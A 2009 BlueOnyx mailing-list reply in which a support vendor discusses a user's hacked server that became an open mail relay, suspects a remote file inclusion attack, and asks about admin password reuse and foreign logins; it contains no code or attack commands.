[BlueOnyx:01824] Re: Second Server Hacked

Greg Kuhnert greg.kuhnert at theanchoragesylvania.com
Sun Jul 26 16:10:21 PET 2009

Steve Davis wrote:
> It was a new BX install, i had some mitigation installed, like dfix  
> and denyhosts.
> No sites, I believe the need for default security that Michael and  
> Greg talked about in other posts is critical to BX success.
Steve's written to me briefly about this attack off-list before posting 
here. I thought I'd provide my response here.

The symptoms described are the same as his first server. It had become 
an open relay. In the case of his first server, there was evidence of 
tampering with sendmail config files. Sendmail Config was rebuilt, and 
open relay problem went away.

 From memory, there was no evidence of non-admin user accounts being 
compromised. Without knowing his login patterns, its hard to know if 
access to the admin account was all authorised access - but I didnt see 
any alarm bells relating to admin account compromise when I was looking 
on his server.

Some of the stuff I saw pointed to the cause being a RFI attack. Only a 
few weeks ago, I had found a similar problem with a larger customer - 
and I managed to keep copies of the malware that was installed. In 
Steve's case, I didnt do a full investigation to identify the specific 
vulnerability... but log files did indicate a fair bit of attack 
activity. I installed prototype tool to mitigate all RFI attacks against 
the server.

My advice to Steve was that dfix and denyhosts (and my prototype tools) 
are basic tools that help protect against specific common problems, but 
I advised him to look at a security package from either Solarspeed or 
Compass to help provide a broader security solution.

I have not had a look at this 2nd server yet. Assuming the server has 
dfix and denyhosts.... and no websites installed.... the next question I 
would ask relates to the admin password on the new server. Is it unique? 
Is it the same as an admin password on other servers? Has anyone logged 
in from foreign IP addresses using the admin account?

Greg Kuhnert

|   / \   Greg Kuhnert, gkuhnert at compassnetworks.com.au               |
| <  o  > Compass Networks - Pointing you in the right direction      |
|   \ /   Come see us for BlueQuartz / BlueOnyx modules & Support.    |

More information about the Blueonyx mailing list